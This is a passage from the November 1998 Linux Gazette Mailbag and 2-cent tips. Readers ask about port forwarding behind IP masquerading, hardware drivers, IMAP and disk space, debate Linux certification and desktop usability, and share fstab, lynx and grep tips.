Linux Gazette... making Linux just a little more fun!

Copyright © 1996-98 Specialized Systems Consultants, Inc.


Welcome to Linux Gazette!(tm)


Published by:

Linux Journal


Sponsored by:

InfoMagic

S.u.S.E.

Red Hat

LinuxMall

Linux Resources

Mozilla

Cyclades

Our sponsors make financial contributions toward the costs of publishing Linux Gazette. If you would like to become a sponsor of LG, e-mail us.

Linux Gazette is a non-commercial, freely available publication and will remain that way. Show your support by using the products of our sponsors and publisher.


Table of Contents
November 1998 Issue #34



The Answer Guy


TWDT 1 (text)
TWDT 2 (HTML)
are files containing the entire issue: one in text format, one in HTML. They are provided strictly as a way to save the contents as one file for later printing in the format of your choice; there is no guarantee of working links in the HTML version.


Got any great ideas for improvements? Send your


This page written and maintained by the Editor of Linux Gazette,


"Linux Gazette...making Linux just a little more fun!"


 The Mailbag!

Write the Gazette at

Contents:


Help Wanted -- Article Ideas


 Date: Sun, 04 Oct 1998 16:04:47 -0500
From: "Casey Bralla",
Subject: Single IP Address & Many Servers. Possible?

This is for the "article wanted" section of the Linux Gazette. Thanks!

I have a single IP address for accessing the Internet. I have an intranet with several old 486-class computers which all access the Internet via IP masquerading. The single machine which is actually connected to the Internet (and does the masquerading) is not powerful enough to run a news server, mail server, HTTP server, etc. I would like to split these functions up among the cheap computers I have lying around. How can I get HTTP requests serviced by the HTTP server even though that machine is not directly connected to the Internet with its own IP address?

Example Diagram below:

 
207.123.456.789  (Single IP address to the Internet)
        |
        |
        486 DX/2-66   (IP Masquerading)
                |
                |
                486 DX-33  Mail Server    192.168.1.1
                |
                |
                K-5 133  HTTP Server   192.168.1.2
                |
                |
                486 DX-33 Leafnode News Server 192.168.1.3
                |
                |
                (Other local machines)
I want anyone on the Internet who accesses my web server at 207.123.456.789 to be directed to the computer at 192.168.1.2 on the intranet. (Obviously, the intranet users have no problem reaching the correct machines, since they just reference the local 192.xxx.xxx.xxx IP addresses. But how can I make the same functionality available to the rest of the known universe?)

Casey Bralla
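
For anyone attempting this, a sketch of one approach: the masquerading box can forward inbound connections, port by port, to the internal servers. This assumes a 2.0-series kernel with the IP port forwarding patch and its ipportfw tool (on 2.1/2.2 kernels, ipmasqadm portfw does the same job); the syntax follows the IP Masquerade documentation, and the addresses are the ones from the letter:

 
   # on the masquerading 486, as root
   ipportfw -A -t207.123.456.789/80  -R 192.168.1.2/80    # web
   ipportfw -A -t207.123.456.789/25  -R 192.168.1.1/25    # mail
   ipportfw -A -t207.123.456.789/119 -R 192.168.1.3/119   # news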


 Date: Wed, 7 Oct 1998 15:40:06 -0500
From: "John Watts",
Subject: Missing network card

I've installed Debian 2.0 (hamm) from diskette on a system at work. The idea was to set it up as a file/print server for my department. Unfortunately, Linux doesn't believe me when I tell it that there is a network card. It's the EtherExpress 16. I've tried reinstalling and autoprobing, no luck. I've tried different Linux distributions, no luck. HELP!!!

John Watts
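
The EtherExpress 16 is an ISA card that the kernel often fails to autoprobe. A sketch of the usual workaround, assuming the card sits at I/O 0x300 and IRQ 10 (placeholder values -- check them with Intel's setup disk):

 
   # driver compiled into the kernel: pass the location at boot (/etc/lilo.conf)
   append="ether=10,0x300,eth0"

   # driver built as a module: pass the location when loading it
   insmod eexpress io=0x300 irq=10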


 Date: Tue, 06 Oct 1998 21:36:12 PDT
From: "Jonathan Bryant",
Subject: Linux Extra?

I've been trying to encourage my Dad to try Linux. He has shown interest, but was curious whether there is a Linux counterpart to Extra! on Windoze. He does a lot of work on the mainframe and needs something that can provide a "3270 terminal interface" for a "TSO session". I wonder if there are any old-school programmers out there who can recommend a piece of software to suit his needs.

Thanks
Jonathan Bryant
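
Two programs that may fit, assuming a plain TN3270 connection to the mainframe is acceptable: the x3270 emulator for X and the console client tn3270. Both take the host name on the command line (the name below is a placeholder):

 
   x3270 mainframe.example.com      # under X
   tn3270 mainframe.example.com     # on the console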


 Date: Fri, 09 Oct 1998 08:45:50 -0400
From: "Brian M. Trapp",
Subject: NumLock - On at startup?

Hi! I've been reading the Linux Gazette for almost a year now. NICE WORK!!! You're a great resource.

Here's my quick and probably easy question: on reboot (yes, I do that occasionally, just to use Win95 and Quicken), Linux (Red Hat 5.1) defaults to starting up with NumLock off. How can I get it to switch NumLock on for me automatically? (This is a matter of pride - I made the mistake of telling my girlfriend how great and powerful the OS is, and then she had to go and discover the NumLock quirk for herself...)

Thanks!
Brian Trapp
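
One common fix, sketched for the text consoles (an X session needs separate treatment): run setleds, from the kbd package, over each virtual console at boot, for example from /etc/rc.d/rc.local on Red Hat:

 
   # turn NumLock on for virtual consoles 1-8
   for tty in /dev/tty[1-8]; do
       setleds -D +num < $tty
   done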


 Date: Fri, 9 Oct 1998 09:47:05 +0800
From: "ctc",
Subject: Where to find S3 ViRGE GX2 card driver for Linux

I use an S3 ViRGE GX2 video card in my computer, but I cannot run startx. Do you know where I can find drivers for this kind of card? Any information is greatly appreciated. Thanks.

Zhang-Hongyi


 Date: Sun, 11 Oct 1998 16:38:00 -0700
From: Ed Ewing,
Subject: article idea

An article regarding cable modems and security, multiple interfaces etc.

Thanks
Ed


 Date: Sun, 11 Oct 1998 10:47:09 +0200
From: "P.Plantinga",
Subject: drivers savage Linux

Are there X Window System drivers for my Savage card under Red Hat 5.1? If there are any, please let me know where to get them.

Thanks
P.Plantinga


 Date: Sat, 10 Oct 1998 04:23:56 -0400
From: Eduardo Herrmann Freitas,
Subject: Ensoniq Audio PCI Sound Card

I would like to know if it is possible to install an Ensoniq Audio PCI Sound Card on Linux...

----
Eduardo


 Date: Mon, 12 Oct 1998 14:01:07 -0400
From: "Mann, Jennifer",
Subject: looking for information

Hi. I am looking for information about how Linux handles transactions and database support. Has the Linux Gazette published any articles pertaining to this topic? If so, I would like to know if and where I can find those articles on the web.

Thank you,
Jennifer Mann


 Date: Thu, 15 Oct 1998 09:01:46 -0500
From: "Mark Shipp(Soefker)",
Subject: Confused with ProComm scripting

I got to your web site through a search on Yahoo. I must say that your help is a very valuable resource.

The reason that I'm doing this search is that I'm looking for someone with experience in Aspect scripting. Could you, or someone you know, steer me in the right direction?

What I'm trying to do is create a counter that transmits its value in order to open connections to different nodes on a network. Below is the part of the program that is giving me the problem. It works, except that I have to use the "TERMMSG" command instead of a "TRANSMIT". This won't do, because the "open 0,(value)" statement has to be transmitted across the LAN.

Thanks for your help and time,
Mark

 
proc main
   integer unit
   while unit != 3      ; This means "while unit does *not* equal 3".
      unit++            ; Increment the value of counter (add 1 to it)
      termmsg "open 0,%d" unit
      transmit "^M"
                        ; This is where I would add in my other programming
      pause (2)
   endwhile             ; When unit equals 3 proceed, else count unit and restart
                        ; This is where I would close the network
endproc


 Date: Wed, 14 Oct 1998 15:29:49 +0000
From: "J luis Soler Cabezas",
Subject: I need info

Hello, I have a TX Pro II motherboard with an onboard VGA video chip. The problem is that the X Window System (XF86Config) doesn't recognize this video chip; Linux can't access the emulated video RAM.

I look forward to your reply, and please excuse my English.

----
Luis


 Date: Mon, 19 Oct 1998 08:31:49 -0700
From: Ken Deboy,
Subject: Win95 peer-to-peer vs. Linux server running Samba

I'm wondering if anyone can tell me the advantages of a Linux machine running as a print server for a network of Win95 machines vs. just hanging the printer off one of the Win95 machines and setting them up in a peer-to-peer arrangement. You don't have to convince me, because I _do_ run Samba as my print server, but what can I tell my friends to convince them, especially if they aren't having too many problems with their Windoze machines? Thanks for any comments, but no flames...

Ken Deboy
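
One argument worth making: the Linux box is always on, costs nothing per seat, and the Samba side of the setup is tiny. A minimal sketch of the relevant smb.conf sections, assuming a standard BSD-style /etc/printcap and an existing spool directory:

 
   [global]
      printing = bsd
      printcap name = /etc/printcap

   [printers]
      path = /var/spool/samba
      printable = yes
      guest ok = yes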


 Date: Sun, 18 Oct 1998 18:03:57 -0400
From: "Gregory Engel",
Subject: How to add disk space to RH 5.1?

I am a new Linux user, having installed Red Hat 5.1 last month. (So far so good.) After installing several goodies and libraries like qt, I find myself running out of disk space on my / partition. I have a SyQuest EZ-Flyer removable disk drive that I didn't use at all during the install.

My question is: can I move some of the directories that defaulted to the root partition, like /tmp and /var, to this drive without a full re-installation, and if so, how? Also, I really couldn't figure out how to get the thing working during the install. It is a SCSI drive that connects to the parallel port. Red Hat lists it as a supported drive but was of little help when I asked them for specific instructions.

If there is some other strategy I might use to gain disk space without a re-installation I would like to hear it. I'm still amazed I got the thing going in the first place. The partitioning makes me nervous.

Thanks,
Greg Engel
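
A sketch of the usual approach, assuming the SyQuest eventually shows up as a SCSI disk (/dev/sda1 below is a placeholder for whatever device it registers as): make a filesystem on the cartridge, copy a large directory such as /var onto it from single-user mode, and mount it over /var at boot.

 
   mke2fs /dev/sda1               # destroys anything on the cartridge!
   mkdir /mnt/ez
   mount /dev/sda1 /mnt/ez
   cp -a /var/* /mnt/ez/          # copy, preserving permissions and links
   mv /var /var.old && mkdir /var
   # then add to /etc/fstab:
   #   /dev/sda1   /var   ext2   defaults   1 2

Once a reboot proves the new /var works, /var.old can be deleted to reclaim the space.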


 Date: Tue, 20 Oct 1998 19:50:58 -0700
From: Michael McDaniel,
Subject: imapd

I have found a lot of information about using clients with IMAP servers. I have found basically _nothing_ about how to actually make the imapd server on Linux do anything.

I can point NetScape Messenger at the localhost IMAP server and it (NS) dutifully says "no messages on server". Ok, I know that; how do I get messages on it?

My Suggestion:

Provide an article about imapd - how to set up hosts.allow for security, how to configure sendmail.cf to use it (I'm pretty sure this has to be done), how to set up user mailboxes, etc.

I would love to see an article like this. By the way, how can I be automatically notified when a new issue comes out? I thought I was receiving that information but maybe not - I haven't seen any info about the new articles as they come out lately.

Michael McDaniel
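
Until such an article appears, a sketch of the access-control half of the request, assuming the UW imapd shipped with Red Hat, run from inetd and wrapped by tcpd:

 
   # /etc/inetd.conf -- the stock imapd line:
   imap  stream  tcp  nowait  root  /usr/sbin/tcpd  imapd

   # /etc/hosts.allow -- admit only localhost and the local net
   # (192.168.1. is a placeholder for your own network):
   imapd: 127.0.0.1 192.168.1.

Note that UW imapd simply serves the user's existing mail spool, and sendmail's normal local delivery puts messages there, so no sendmail.cf change should be needed just to see mail arrive.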


 Date: Mon, 26 Oct 1998 02:27:44 -0500
From: "Oblivion",
Subject: Help, with Debian 2.0 install from CD-ROM not part of HDD card

I am having problems getting Debian 2.0 to install the important, extra, and/or optional packages, which include the kernel source and patches. I have a working base system, but it does not recognize the CD-ROM drive, so I cannot add or upgrade any packages. I have tried moving the CD-ROM drive to run off the HDD controller, but then the system will not even get past the BIOS at startup. The system specs are included at the base of this message.

 
        CPU:                    Cyrix 5x86 100MHz
        Hard Drives:            BigFoot 1.2 Gb
                                WD 4.0 Gb
        Floppy Drives:          3.5"
        Bus Type:               PCI
        Extra Drives:           TEAC CD-55 tray CD-ROM 4x
        Mouse:                  Bus, on COM1
        Modem:                  on COM2
        Memory:                 24 Megs
        Root Directory:         hdc7
        O/S on system:          Windows 95
        Kernel Version:         2.0.34
        Sound Card:             drives the CD-ROM - Sound Blaster Pro 16 compatible

Gary


 Date: Thu, 29 Oct 1998 17:53:29 +0100
From: Thierry Durandy,
Subject: Tie with the penguin logo

Do you know if I can find a tie with the Linux penguin logo on it? I would be interested in buying one to wear, to show my opinion while keeping the suit.

Thierry


 Date: Fri, 30 Oct 1998 17:00:16 EST
From: Ross,
Subject: Cirrus Logic is the pits

Help me: I have a huge computer science project to hand in on Monday at 11:00 GMT, and my university won't let us use the UNIX boxes on weekends. I have Linux, but alas I have a Cirrus Logic 5446 PCI card with 2MB, and X can't hack it--it corrupts the screen. My mate bought a new card to fix this problem. There must be a cheaper solution: a patch, a new server, whatever.

Also, any quick help on how to set up a PPP connection would be appreciated.

Cheers to anyone who can help.

A newly converted Linux user,
Ross
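
A cheaper thing to try first, offered as a guess rather than a known fix: screen corruption on Cirrus chips is often an acceleration bug, and the XFree86 SVGA server accepts a "noaccel" option in the Device section of /etc/XF86Config:

 
   Section "Device"
       Identifier "Cirrus Logic GD5446"
       Option     "noaccel"        # fall back to unaccelerated drawing
   EndSection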


General Mail


 Date: Sun, 4 Oct 1998 22:39:09 +0200
From: A.R. (Tom) Peters,
Subject: Linux certification

I read your article in Linux Gazette 33 on a Linux Certification program with interest. However, I would like to point out (and I will not be the only one), that this issue was already raised by Phil Hughes in L.J. Nov.1997 p.10; since then, there has been a still-active discussion in http://www.linuxjournal.com/HyperNews/get/certification.html. Therefore, I am somewhat surprised to see this paper appear in Linux Gazette without reference to these discussions. Moreover, Robert Hart of Red Hat has been actively defining a RH certification program; see http://www.redhat.com/~hartr/ .

In principle, I support initiatives like these. I strongly disagree, however, with Dan York's stress on the benefits for conference centers and publishers. Although I don't care if they make a lot of money out of it, I am very much afraid of the consequences: if something like this really catches on, only people who can afford the certification program will be taken seriously as Linux consultants or developers. Everyone else will be officially doomed to be an "amateur", irrespective of competence or contributions already made to the Linux movement. So I think we should NOT copy the expensive MCSE model, but keep Linux certification affordable.

--
Tom "thriving on chaos" Peters


 Date: Sun, 4 Oct 1998 16:53:56 -0400
From: Dan York,
Subject: RE: Linux certification

Tom,
Many thanks for the pointers... I was not aware of the discussion on the linuxjournal.com site and had, in fact, been quite unsuccessful in finding such discussions on the web. Thank you.

Thank you for pointing out Robert Hart's site... yes, others have sent along that pointer as well. Maybe I missed it, but when I was going through Red Hat's site, I didn't see a link to his pages on certification. Thank you for sending the pointer... and I hope Red Hat and Caldera can unify their efforts. We'll see.

As far as your comments on the pricing, I understand your concerns. The struggle is to keep it affordable while also making it objective (which I would do through exams). In truth, Microsoft's MCSE program could cost only $600 (the price of the 6 exams), although in practice people spend much more for books and/or training classes.

Thanks for your feedback - and I look forward to whatever discussions evolve.

Regards,
Dan


 Date: Sat, 3 Oct 1998 16:56:14 +0200
From: "David Andreas Alderud",
Subject: Reb0l

Just thought I'd mention something everybody needs to know... Reb0l is no longer beta and is available from www.rebol.com. Really nice: I've used Reb0l since late last year (on my Amiga, though) and I'm really pleased; I certainly think it will win out over every other scripting language.

Kind Regards,
Andreas Alderud.


 Date: Fri, 2 Oct 1998 10:29:21 -0500 (CDT)
From:
Subject: re: links between identical sections

Although I can't speak for other areas of the Gazette, the Graphics Muse can be searched using the Graphics Muse Web site. I have all the back issues online there with topical headings for the main articles in each issue. This feature just went live (online) last night, so it's brand new (which is why no one knew about it before :-).

Take a look at http://www.graphics-muse.org/linux.html and click on the "Muse" button. That will do it for you.

----
Michael J. Hammel, The Graphics Muse

We've added those requested links to each of the regular columns now. Ellen Dahl did this good work for us. --Editor


 Date: Fri, 2 Oct 1998 04:02:23 -0400
From: "Tim Gray",
Subject: Linux easy/not easy/not ready/ready YIKES!

OK, I've noticed one very strong theme in every message I have ever read about Linux and why it won't be accepted on the desktop. Every message states, in one way or another, "if they see a command prompt, they will panic". I am appalled at how IT professionals view users as idiots and morons. I refuse to call myself an IT professional, because I help my users and clients use their software rather than "just fix it when they mess it up". A user can learn the command prompt quickly, and "just type setupmodem and press Enter" (or whatever command or script you like) is easier to teach than "click on Start, Settings, Control Panel, System, bla bla bla...". I have started to move all my clients to Linux, starting with the servers, saving them time and money. And I have a CEO who logs in as root and adds and removes users at one location. Users are much smarter than everyone gives them credit for, and a command prompt doesn't affect them as if the devil just spoke from the speakers. If the IT departments around the world put one fifth of the effort into educating users that they put into complaining about them, this would be a non-issue. As computer professionals we are there to keep things running and educate our users, not to sit on a pillar looking down with a look of "what did you do to it now?"

As one last question: everyone says, "I'll use Linux when it has a standard GUI"... What is a standard GUI? Windows doesn't have one, and Linux is closer to having a standard GUI than anything else available.

----
Tim Gray


 Date: Tue, 06 Oct 1998 06:56:51 -0400
From: Nathaniel Smith,
Subject: Information on Linux

I wrote you with an article idea, suggesting an article on how to use Linux for us click-and-go people who are computer dummies, and you were kind enough to publish it. Before I wrote you, I had already ordered four books (apparently the wrong ones); the two I had received started out, "I will assume you already have a full working knowledge of Unix commands". Since then, several kind souls have taken their time and energy to point me in a direction where I can help myself, and that is all anyone can ask. Some have gone even further and tried to help me with a hard drive problem that I have. I would like to see someone try that with the Windows crowd; you would most likely come up with an empty mailbox. I think that says a lot about the type of people that use Linux. I just want to thank you and everyone who has tried to help me; I will try to help myself before asking for any more help. I think I have enough to keep me busy learning for quite a while.

thank you
Nathaniel


 Date: Thu, 8 Oct 1998 18:44:33 -0400
From: keith,
Subject: suggestion for Linux security feature

I wonder if you can point me in the right direction to make a suggestion for a new "feature" of Linux which could further help to differentiate it in the marketplace, and which might really give it a LOT of exposure (good) in today's security-conscious press...

The security of computer information has been in the press a lot lately, detectability of "deleted" files on people's hard drives, "secret" files, cache files, cookies, etc. which are out of the purview of the typical (and maybe even the advanced!) user. People either think they've deleted things which they haven't really expunged, or their files are infiltrated, perhaps by a child (accidentally, of course!).

It seems to me quite possible to structure an OS like UNIX (and Linux in particular, since it is under development by so many gifted people) in such a way that all such files are created in a directory under the current user's ownership, in a knowable and findable place, so that:

A. only that user could access their own cache, cookies, pointer files, etc. (I do not know how deleted files could be safeguarded in this way, unless it is simply to encrypt everything. Hmmm.);

B. these files - the whole lot of them - could be scrubbed, wiped, obliterated (that's why it's important for them to be in a known and findable place) by their owner, without impairing the function of the applications or the system, and without disturbing similar such files for other users.

C. it would be nice, too, if there were a way to prevent the copying of certain files, including copying by backup programs. For example, I'm a Mac user and we use Retrospect to back up some of our Macs; it has a feature to suppress the backing up of a particular directory by putting a special character (a "bullet", or option-8) at the beginning or end of the directory name. But if this could be an OS-level feature, it would be stronger.

If I'm user X, and I want to get rid of my computer, or get rid of everything that's mine on the computer, I should just be able to delete all of my data files (and burn them or wipe them or otherwise overwrite that area of the disk), which I can surely do today. But in addition, I should know where to go to do the same thing with whatever system level files might be out there, currently unbeknownst to me, and be able to expunge them also, without affecting anything for anyone else.

Who would work on such a thing as this? Who would I suggest this to? Of course, it's my idea. (c) Keith Gardner 1998. :) But if something like this could be set up, wouldn't it go a long way in the press, in corporate and government buying mind set, etc.?

I'm writing this very quickly, the idea really just came to me while reading the NY Times this morning with an article (in Circuits, 10/8/98) about computer security, and I am on my way out the door. I don't have time to give it much polish. But I hope the ideas are clear enough. Let me know what you think.

Thanks.
Keith Gardner


 Date: Fri, 16 Oct 1998 15:41:25 -0500 (CDT)
From: Bret McGuire,
Subject: Availability of information for newbies

The October issue of Linux Gazette featured a number of mail messages from individuals seeking basic information on how to start up and run a useful Linux system. A common complaint among these individuals was that basic information was not readily available, leading to the rather humorous suggestion that anyone who operates a usable Linux system was somehow "born with this information". :)

This isn't the case. There are a number of locations on the Web which offer a great deal of information about the Linux operating system. The best starting point is probably still the Linux Documentation Project...

http://sunsite.unc.edu/mdw/

(or at least that's where I always go... I understand there are mirrors all over)

This site features HOWTO documents on nearly every topic you can imagine, along with current copies of the various Guides (everything from the Installation and Getting Started Guide through The Linux Users' Guide to The Linux Network Administrators' Guide, etc.). I suspect that this site either has the answer to your question or has a link to someplace else that does. Definitely worth looking at...

----
Bret


 Date: Mon, 19 Oct 1998 13:54:18 +0200
From: Jonas Erikson,
Subject: go go Network do or die!

My concern is that the free software alternative is going to its grave due to outdated bindings to the old standard UNIX core.

In comp.os.plan9 there are discussions like:

| Hasn't the coolness of Linux worn off? If you want true excitement with
| how cool an OS is and the fun of pioneering again, how about cloning
| Plan 9?

Later in the same thread:

| We need a new Linus to start writing a Plan 9 kernel. GNU's Hurd doesn't
| go as far as a cloned Plan 9 would.

And there is more of the same in other comp.os.* groups...

I urge us not to start all over again, but to modify what is market-recognized and stable. I think, unlike many other freeware enthusiasts, that there is a need for software infrastructure. A weakened Linux would scatter a lot of good work and inspiration, and it would take far too much time for a new alternative to reclaim the market's confidence in freeware.

I know that what I suggest is a long way off in terms of Linux development, and that Linux holds a legacy of strong infrastructure. But I don't know whether Linux can tackle the infrastructure requirements building up after the first wave of Internet pioneering.

Users in the MS world see ACLs and sharing capabilities (or at least the image of them) as a condition for selecting a system. The development trend is also toward distributed services, not only inside corporations but also traded via CORBA or DCOM. Other, lighter standards such as P3P are emerging too, and they require a more distributed approach.

If we look at sharing with supposedly "advanced" capabilities like those of the CODA and AFS file systems, that is just the beginning - and, I think, only a symptom of the structures lacking inside UNIX. (CODA _is_ advanced in many respects not at issue here.)

New Internet standards make UNIX applications handle more and more security features that are not compatible with the system. Building walls into systems by not providing infrastructure is not good for freeware; it's not like the Internet at all.

The winning operating system will be the one most flexible in distributed security while staying compatible with old standards... And the point of using a freeware alternative is to be ahead and in control.

Are we still?

So, for the Linux ext2fs ACL development in kernel 2.3: do embed [domain][gid/uid][rights] in the ACL entries!

Don't forget that:
Linux is to the "open/free" OS arena what Windows is to the whole OS arena, and software is like infrastructure: only small differences are necessary to gain the market. Like roads, software needs to be compatible with most cars, yet still improve. Some infrastructures now being implemented set new standards for the cars; it is a bad idea not to take advantage of those standards.

Jonas


 Date: Sun, 25 Oct 1998 06:53:39 -0500
From: "Bill Parker",
Subject: Compliments on a great issue

Great issue. It will take me some time to absorb even some of the information and good ideas presented here.

I particularly benefited from "Thoughts about Linux," by Jurgen Defurne and "DialMon: The Linux/Windows diald Monitor," by Mike Richardson. I have not had time to read the rest yet.

Thanks and best wishes,
Bill Parker


 Date: Mon, 26 Oct 1998 16:16:37 -0800
From: Dave Stevens,
Subject: Rant

October 17, 1998, Smithers, B.C.
There is a lot of criticism of Linux that goes more or less like this - "Well if it was so hot it would cost something. Everything free is no good."

It isn't necessarily so and it just isn't so.

Copyright is a social vehicle for compensating creators of intellectual property. The copyright expires eventually. Then the benefit of the intellectual work can, if it is of lasting value, be used more widely and, in principle at least, in perpetuity. This process and model are very familiar in other fields of intellectual endeavor but are new to computer programming. If we look at the body of English literature that fills our libraries and bookshelves, there is certainly no direct correspondence between copyright and quality. All of Shakespeare, to take a favorite of mine, is long out of copyright and is some of the best literature ever created. Or Mozart, or Dickens. You make the list.

The whole consumer software business is too new for the copyright process and terms to have worked themselves out to full term. The concept of computer software as intellectual work, potentially of a high calibre, is just too new for social understanding to be widespread. The idea that intellectual work might be contributed and protected in such a way as to enlarge the realm of the possible in the computer part of the public sphere certainly has a way to go before people get used to it.

Does this mean that some of the criticism offered is superficial? To put it kindly, yes. The open source software community is collaboratively creating a standard for computer software below which any commercial vendor will fall at its peril. If you can have all this for free, will you actually pay to get an inferior product? Maybe by accident. But not twice. The growing acceptance of Linux is a step in the spread of the idea of a body of public-domain imperative literature. Its quality is no more to be judged by its price than a Chopin waltz.

I would be happy to discuss any of these ideas with coherent correspondents, and invite both comment and criticism.

Dave Stevens


Published in Linux Gazette Issue 34, November 1998




More 2¢ Tips!


Send Linux Tips and Tricks to


Contents:


No Linux support Lexmark 40 printers

Date: Thu, 15 Oct 1998 12:18:37 -0600 (MDT)
From: "D. Snider",

For your information:
The Lexmark 40 color printers do all setup/alignment from MS whatever OS.

Lexmark first told me they don't support Linux on their new 40 & 45 printers (all alignment functions are done from software under MS-something). But hey, the guys at Lexmark came through: they sent me a C program for aligning the printer.

It would be a good candidate to go into an archive (sunsite.unc.edu). I don't know the process for putting software into an archive, so I am passing it on to you folks. I am also sending it to Grant Taylor, who is listed as the custodian of the Printing-HOWTO. The model 40 printer is PostScript and works well.

Cheers
Dale

The Mailbag: Re: text browsers

Date: Mon, 05 Oct 1998 19:46:43 +0200
From: Tomas Pospisek - Sysadmin,
A user has problems with <B> (bold) text that is not visible in lynx.
Well, this is not a problem with the page, but a problem of lynx configuration. At the bottom of the default lynx config file, one can configure the colors for the display of the different tags as one wishes. The comments in the config file make it very clear how to do this. One can start lynx with the option lynx -f config.file, if I remember right.

Tomas
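
For reference, a sketch of that procedure (in current lynx versions the flag is actually -cfg=FILE, the COLOR: lines sit near the bottom of the file, and the system config path may vary):

 
   cp /etc/lynx.cfg ~/lynx.cfg
   vi ~/lynx.cfg                  # adjust the COLOR:n:foreground:background lines
   lynx -cfg=$HOME/lynx.cfg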


RE: Problem mounting vfat filesystem ...

Date: Mon, 05 Oct 1998 10:13:54 +0100 (IST)
From: Caolan McNamara,
Jan Jansta wrote...
I have a permanent problem with mounting any vfat/dos filesystem with write permissions for all users on my Linux machine. I'm using Red Hat 5.1, kernel version 2.0.34. Does someone know what's not working properly?
Here's what I've done. The exact line from my /etc/fstab:
 
/dev/hda1                 /mnt/win95                vfat   umask=000,auto 1 1
The trick is in setting the umask.

Caolan


Re: Linux Newbie

Date: Sat, 03 Oct 1998 12:59:16 +0200
From: "Anthony E. Greene",

I saw your letter to Linux Gazette and decided to drop you a few pointers.

Linux Documentation Project:
First, the Linux Documentation Project is your friend. Take a look around the site http://sunsite.unc.edu/LDP/. The documents you'll find most valuable as a new Linux user are the "Installation and Getting Started Guide" and "The Linux Users' Guide". Both are available for download in multiple formats. Descriptions and pointers are at http://sunsite.unc.edu/LDP/ldp.html. If you really consider yourself (or your curious friends) clueless, then I'd advise you to buy a ream of paper and print the PDF version of the Linux Users' Guide for casual reading. Then get one of the easier distributions, back up your Win95 data, and give Linux a whirl.

Linux Distributions:
I'd recommend Caldera http://www.caldera.com/ for casual non-programmers who are comfortable with Win95 and just want to try Linux. Current versions of Caldera come with the KDE desktop. KDE presents a familiar interface to Win95 users. Red Hat http://www.redhat.com/ is very popular and also relatively easy, but is oriented more toward knowledgeable computer users. I'm not familiar enough with SUSE http://www.suse.com/ to make a recommendation, although it's supposed to be easy too. Debian http://www.debian.org/ and Slackware http://www.slackware.org/ are considered by most to be for those who already know how to install and use Linux. There are other distributions, but these are the most popular.

Included Documentation:
Once you get Linux installed, fire up Midnight Commander from the command line using 'mc'. This is an easy to use file manager that, despite its DOS look & feel, is also powerful. Use it to take a look around the /usr/doc directory for the wealth of documentation installed in any popular Linux system. You'll be astounded at the amount of information available if you're accustomed to the Win95 way of doing things. The HOWTO documents in particular will be very useful to new users. HOWTOs are cookbook-style documents written by Linux users who have taken the time to share the steps they took to accomplish something in Linux. Perhaps if you use Linux for a while, you'll have occasion to write a HOWTO of your own.

Manual Pages
If you see references to a command in Linux and would like to know more about using it, chances are you'll find a comprehensive description of the command and all its options in the associated Manual Page. Just type: 'man command' at the command line, substituting the name of the command you're interested in and you'll be presented with a summary of the syntax, usage, and available options for the command. Many man pages also include examples and references to related man pages and commands. To see how to use the manual page system itself, just use 'man man'.

Mailing Lists and Newsgroups
Mailing lists and newsgroups provide a good way to find the answer to a question you haven't been able to find the answer to in the extensive documentation included with Linux or available from the LDP. Mailing lists are generally archived and the archives will probably be able to answer your question. If not, post a note asking for a pointer to the documentation and you'll probably get several good answers. If the problem is simple enough, you'll probably get an explanation too. I've found pointers to comprehensive documentation to be more valuable in the long run though. Often, understanding the solution to one problem allows you to solve other problems later. When subscribing to a mailing list or newsgroup, try to find one that's specific to the distribution you use. Most things are the same across distributions, but there are enough small differences that new users would be best served by getting help that's specific to their distribution.

One more thing; be prepared to do lots of reading. ;-)

--
Anthony E. Greene


Locally Searching the Linux Gazette

Date: Sat, 3 Oct 1998 01:33:17 -0400 (EDT)
From: Ray Marshall,

To begin with, I often like to browse and/or reference present and past issues of the Linux Gazette. But since I'm not always connected to the Internet, and even when I am, I hate waiting for a page to download, I mirror it locally, both at home and at work.

On occasion I have found myself grepping the TWDT files for specific references to various topics, commands, packages, or whatever. But a plain grep of lg/issue??/issue??.html misses the first 8 issues, whose files are named differently. So I made some minor changes in lg/issue01to08 and put an alias (command) in ~/.bashrc to allow easy scanning of ALL issues.

First, the changes:

 
  cd ~/html/lg/issue01to08
  ln linux_gazette.html lg_issue1.html
  ln linux_gazette.aug.html lg_issue2.html
  ln linux_gazette.sep.html lg_issue3.html
  ln linux_gazette.oct.html lg_issue4.html
  ln linux_gazette.nov.html lg_issue5.html
Now the command declaration (for bash):
 
  lgfind () { command grep -i "$@" ~/html/lg/issue01to08/lg_issue?.html ~/html/lg/issue??/issue??.html | more ; }
The same declaration in C-shell (csh):
 
  alias lgfind 'grep -i "\!*" ~/html/lg/issue01to08/lg_issue?.html ~/html/lg/issue??/issue??.html | more'
I suppose I could have used "linux_gazette*" in my grep, but that would have put the resulting output out of order. Besides, these links allow the grep to show which issue number a match is found in.

And I suppose I could also have created either soft or hard links to ALL of the TWDT files in another directory. But I would then have to go there and add another link, every time a new issue came out.

Using this is simple, just:

 
  lgfind <string>
and, as is obvious to most experienced UNIX users, I quote the string if it contains spaces. The string can also be a regular expression. You may have noticed the "-i" -- I don't like having to remember the case of the characters I'm looking for.

Once I have the output of lgfind, I point my browser to another html page that I have generated, that contains just links to all of the TWDT files. I will attach that page to this message. You can either add it to the base files, publish it, or whatever TYO. ;-) I put it in the directory that contains your `lg' directory.

I hope this helps someone else, too.

Ray Marshall

PS: I agree with your decision to use "TWDT". It can be read in whatever way one wishes, including very inoffensively. Wise choice.


Re: Problem mounting vfat filesystem

Date: Fri, 02 Oct 1998 21:48:55 +0000
From: Nick Matthews,

From: Jan Jansta
I have a permanent problem with mounting any vfat/dos filesystem with write permissions for all users on my Linux machine. I'm using Red Hat 5.1, kernel version 2.0.34. Does someone know what's not working properly?

I had somewhat the same problem. What I did was to put this in my

 
/etc/fstab:
/dev/hda1                 /dos                      vfat   user,noauto 0 0
I don't always want my /dos partition mounted, because I don't want its files cluttering up my locate database. But making it a user partition means that anyone can mount and use it.

Good luck,
Nick


Mounting DOS Partitions in Linux

Date: Fri, 02 Oct 1998 17:08:23 -0400
From: Ed Young,

Secure Mounting for DOS Partitions:

In order to open up permissions on your DOS partitions in a secure way, do the following:

Note: in the samples below, the DOS usrid (63) and grpid (63) were selected so they wouldn't duplicate any other usrid or grpid in /etc/passwd or /etc/group.

Also, this solution works with Red Hat 5.1, you may have to adjust it slightly if you are using a different distribution.

1) Make a dos user who can't log in by adding the following line to /etc/passwd:

   dos:*:63:63:MSDOS Accessor:/dos:

2) Make a dos group and add users to it. In the following example, root and ejy are in the dos group. To do this, add a line like the following to /etc/group:

   dos::63:root,ejy

